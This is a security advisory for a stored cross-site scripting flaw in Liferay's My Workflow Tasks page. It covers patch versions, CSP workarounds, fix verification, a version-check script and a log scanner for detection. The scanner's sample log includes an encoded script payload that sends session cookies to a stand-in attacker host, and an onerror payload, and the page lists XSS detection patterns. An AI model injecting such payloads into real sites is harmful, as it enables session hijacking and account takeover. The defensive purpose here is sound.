CVE-2025-43785
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Liferay Portal and DXP allows attackers to inject malicious scripts into the My Workflow Tasks page. When users view this page, the scripts execute in their browser context, potentially stealing session cookies or performing actions as the user. This affects Liferay Portal 7.4.3.45-7.4.3.128 and multiple DXP versions.
💻 Affected Systems
- Liferay Portal
- Liferay DXP
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
An administrator who reviews tasks opens the poisoned My Workflow Tasks page and the injected script runs with their privileges: it can read the session cookie if that cookie is not HttpOnly, and in any case it can drive the portal's UI and APIs from the administrator's browser (creating accounts, changing permissions, uploading content), giving the attacker administrative control of the portal. Any further movement into internal systems depends on what the portal server itself can reach, not on the XSS alone.
Likely Case
Session hijacking of ordinary users, credential theft through an injected fake login prompt, defacement of the workflow page, or exfiltration of data visible in the victim's session.
If Mitigated
A CSP that disallows inline scripts stops the payload before it runs, and correct output encoding renders it as harmless text; with either in place the impact is minimal.
🎯 Exploit Status
Exploitation requires an authenticated account that can submit content rendered on the My Workflow Tasks page. Once stored, the payload executes for every user who views that page, including the administrators most likely to review workflow tasks, so the authentication requirement lowers the bar only slightly.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Liferay Portal 7.4.3.129+, Liferay DXP 2024.Q2.10+, 2024.Q1.13+, 7.4 update 93+
Vendor Advisory: https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43785
Restart Required: Yes. Applying a Liferay update or hotfix requires restarting the application server.
Instructions:
1. Back up the Liferay instance (database and ${LIFERAY_HOME}/data) before changing anything.
2. Liferay DXP: download the update or hotfix for your release stream from the Liferay Customer Portal and apply it. Liferay Portal CE: upgrade the bundle to 7.4.3.129 or later.
3. Restart the application server and confirm the new version in Control Panel > Server Administration.
4. Test workflow functionality, in particular the My Workflow Tasks page.
🔧 Temporary Workarounds
Implement Content Security Policy (CSP)
Add a CSP header so that a script injected into the page cannot execute. Liferay's own pages depend on inline scripts, so a bare script-src 'self' will break the portal UI: deploy the policy first as Content-Security-Policy-Report-Only, review the violation reports, and add nonces or hashes for the inline scripts the portal needs before switching to enforcement. Set the header at the reverse proxy or in a servlet filter in front of the portal (web.xml by itself cannot add response headers):
Content-Security-Policy: default-src 'self'; script-src 'self'
Disable My Workflow Tasks Page
Temporarily restrict access to the vulnerable page until patching is complete.
Use Liferay permissions to remove access to My Workflow Tasks for non-essential users
🧯 If You Can't Patch
- Where your own portlets or templates render workflow task data, encode it on output (Liferay's HtmlUtil.escape, or the escaping your template engine provides) instead of trusting stored values; this protects your code, not the vulnerable page itself, which only the vendor patch fixes
- Put a web application firewall with XSS rules in front of the portal and scope them to the workflow task endpoints; expect evasions (encoded or split payloads), so treat the WAF as a stop-gap rather than a fix
🔍 How to Verify
Check if Vulnerable:
Check the Liferay version via Control Panel > Server Administration > Properties, in the startup banner the portal writes to the application server log, or in the version attribute of liferay-portal.xml. A Portal CE version from 7.4.3.45 through 7.4.3.128 inclusive is vulnerable; for DXP, compare against the patched versions listed above for your release stream.
Check Version:
Check the Control Panel or examine ${LIFERAY_HOME}/tomcat-9.0.xx/webapps/ROOT/WEB-INF/liferay-portal.xml. On DXP, patching-tool/patching-tool.sh info also lists the installed update and any hotfixes.
Verify Fix Applied:
Confirm the reported version is at or above the patched version for your release stream (7.4.3.129 for Portal CE; 2024.Q2.10, 2024.Q1.13 or 7.4 update 93 for DXP). Then, in a non-production environment, submit a harmless marker such as <b>test</b> through the workflow path and check that the My Workflow Tasks page shows the literal text rather than bold text.
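As an added example (not part of the advisory and not Liferay's code), the check below classifies a version string against the ranges stated on this page: Portal CE 7.4.3.45 through 7.4.3.128 vulnerable and 7.4.3.129+ patched; DXP 2024.Q2.10+, 2024.Q1.13+ and 7.4 update 93+ patched. It compares the components as integers rather than as strings, the mistake that makes "7.4.3.129" sort before "7.4.3.45", and it accepts a whole log line so it can be pointed at the startup banner. The banner wording used in the demo and the accepted spellings of DXP 7.4 update versions (7.4.13-u93, 7.4 Update 93) are assumptions. Because the page gives no affected lower bound for DXP, a DXP version below the listed threshold is reported as below-patched-version, not as vulnerable.

```python
import re
import sys

# Ranges copied from this advisory's text.
PORTAL_AFFECTED_MIN = (7, 4, 3, 45)
PORTAL_AFFECTED_MAX = (7, 4, 3, 128)      # 7.4.3.129+ is patched

# First patched version per DXP release stream (from the advisory).
DXP_PATCHED_MIN = {"2024.Q2": 10, "2024.Q1": 13, "7.4-update": 93}

_PORTAL_RE = re.compile(r"\b7\.4\.3\.(\d+)\b")
_DXP_QUARTERLY_RE = re.compile(r"\b(20\d{2}\.Q[1-4])\.(\d+)\b")
# Assumed spellings of DXP 7.4 update versions, e.g. "7.4.13-u93" or "7.4 Update 93".
_DXP_UPDATE_RE = re.compile(r"\b7\.4(?:\.13)?[\s-]*(?:update|u)\s*(\d+)\b", re.IGNORECASE)


def classify(text: str) -> str:
    """Classify the first Liferay version found in `text`.

    Returns one of:
      "vulnerable"             Portal CE inside the affected range
      "patched"                at or above the patched version for its stream
      "below-patched-version"  DXP stream listed on this page but older than the fix
      "not-listed"             no version found, or a stream/range this page
                               says nothing about
    Components are compared as integers; as text "7.4.3.129" < "7.4.3.45".
    """
    m = _DXP_QUARTERLY_RE.search(text)
    if m:
        stream, patch = m.group(1), int(m.group(2))
        if stream not in DXP_PATCHED_MIN:
            return "not-listed"
        return "patched" if patch >= DXP_PATCHED_MIN[stream] else "below-patched-version"

    m = _DXP_UPDATE_RE.search(text)
    if m:
        update = int(m.group(1))
        return "patched" if update >= DXP_PATCHED_MIN["7.4-update"] else "below-patched-version"

    m = _PORTAL_RE.search(text)
    if m:
        version = (7, 4, 3, int(m.group(1)))
        if PORTAL_AFFECTED_MIN <= version <= PORTAL_AFFECTED_MAX:
            return "vulnerable"
        if version > PORTAL_AFFECTED_MAX:
            return "patched"
        return "not-listed"          # older than 7.4.3.45: this page does not cover it

    return "not-listed"


if __name__ == "__main__":
    # Pass version strings or whole log lines as arguments; with none given,
    # constructed samples are used (the banner wording is an assumption).
    samples = sys.argv[1:] or [
        "7.4.3.120",
        "7.4.3.129",
        "Starting Liferay Community Edition Portal 7.4.3.45 CE GA45",
        "2024.Q2.9",
        "7.4.13-u93",
    ]
    for item in samples:
        print(f"{classify(item):<22} {item}")
```

Run it against the version line from Server Administration or a grep of the startup log; anything reported as not-listed needs a manual check against the vendor advisory, since the script only knows the ranges this page states.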
📡 Detection & Monitoring
Log Indicators:
- Script tags, event-handler attributes (onerror=, onload=) or javascript: URIs, including their URL-encoded forms, in content submitted to workflow task endpoints
- Clusters of WAF or input-validation rejections on workflow task endpoints from a single account, which suggest an attacker iterating on a payload
Network Indicators:
- Browsers loading scripts from, or sending requests to, domains outside your allow-list right after fetching the My Workflow Tasks page; a Content-Security-Policy-Report-Only header surfaces these as violation reports without affecting users
- Outbound connections from user sessions to unfamiliar hosts immediately after viewing workflow tasks, consistent with cookie or data exfiltration
SIEM Query:
source="liferay" AND uri="*workflow*" AND (message="*<script*" OR message="*%3Cscript*" OR message="*javascript:*" OR message="*onerror=*" OR message="*onload=*")
Match on concrete payload fragments rather than the bare word script, which also matches every JavaScript asset request and buries real hits in noise.
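A SIEM wildcard query still misses encoded payloads. As an added example, not part of the advisory and not a Liferay component, the scanner below applies the same detection idea to log lines with the evasions handled: it URL-decodes repeatedly (to catch double encoding), resolves HTML entities, lower-cases, and then matches concrete payload fragments only for requests to workflow URIs, so a JavaScript asset request under a workflow path is not a hit. It also counts hits per account, which is the "multiple attempts" indicator above. The line format (timestamp, user, method, URI, optional submitted fields), the sample lines and the portlet identifier in the URIs are constructed for the demo, not Liferay's actual log output.

```python
import html
import re
import urllib.parse
from collections import Counter

# Indicator names -> patterns, matched against decoded, lower-cased text.
XSS_PATTERNS = {
    "script-tag":    re.compile(r"<\s*script\b"),
    "js-uri":        re.compile(r"javascript\s*:"),
    "event-handler": re.compile(r"\bon[a-z]+\s*="),          # onerror=, onload=, ...
    "html-tag":      re.compile(r"<\s*(?:img|svg|iframe|object|embed)\b"),
}

# Constructed line format: <timestamp> <user> <METHOD> <uri> [<submitted fields>]
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<user>\S+) (?P<method>[A-Z]+) (?P<uri>\S+)(?: (?P<body>.*))?$"
)


def normalize(text: str, rounds: int = 3) -> str:
    """Undo the layers an attacker stacks to defeat naive wildcard matching:
    URL-encoding (possibly doubled), HTML entities, and letter case."""
    out = text
    for _ in range(rounds):
        decoded = html.unescape(urllib.parse.unquote_plus(out))
        if decoded == out:
            break
        out = decoded
    return out.lower()


def scan_line(line: str):
    """Return a finding dict for one line, or None if it is benign or out of scope."""
    m = LINE_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    if "workflow" not in uri.lower():          # same scope as the SIEM query
        return None
    haystack = normalize(uri + " " + (m.group("body") or ""))
    indicators = [name for name, pat in XSS_PATTERNS.items() if pat.search(haystack)]
    if not indicators:
        return None
    return {"ts": m.group("ts"), "user": m.group("user"), "uri": uri,
            "indicators": indicators}


def scan(lines):
    """Scan many lines; returns the findings in log order."""
    findings = []
    for line in lines:
        finding = scan_line(line)
        if finding:
            findings.append(finding)
    return findings


def repeat_offenders(findings, threshold: int = 2):
    """Accounts with `threshold` or more hits, sorted by name."""
    counts = Counter(f["user"] for f in findings)
    return sorted(user for user, n in counts.items() if n >= threshold)


# Constructed sample lines; the p_p_id value is a placeholder, not Liferay's real portlet id.
SAMPLE_LOG = """\
2025-06-01T10:00:01Z alice POST /group/guest/~/control_panel/manage?p_p_id=workflow_task_portlet name=Quarterly+report
2025-06-01T10:00:05Z mallory POST /group/guest/~/control_panel/manage?p_p_id=workflow_task_portlet name=%3Cscript%3Efetch('//evil.example/'%2Bdocument.cookie)%3C/script%3E
2025-06-01T10:00:09Z mallory POST /group/guest/~/control_panel/manage?p_p_id=workflow_task_portlet comment=%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(1)%26gt%3B
2025-06-01T10:00:12Z bob GET /o/workflow-task-web/javascript/main.js
2025-06-01T10:00:15Z carol GET /group/guest/documents?description=script+for+the+play
""".splitlines()


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['user']:<8} {', '.join(f['indicators'])}")
    print("repeat offenders:", repeat_offenders(hits))
```

The event-handler pattern is the noisiest of the four (any field name ending in "on" followed by letters, such as onlinebooking=, will match), so tune it on your own traffic before alerting on it; the third sample line shows why entity decoding matters, since the payload arrives as &lt;img ...&gt; inside URL-encoding and only reads as a tag after both layers are removed.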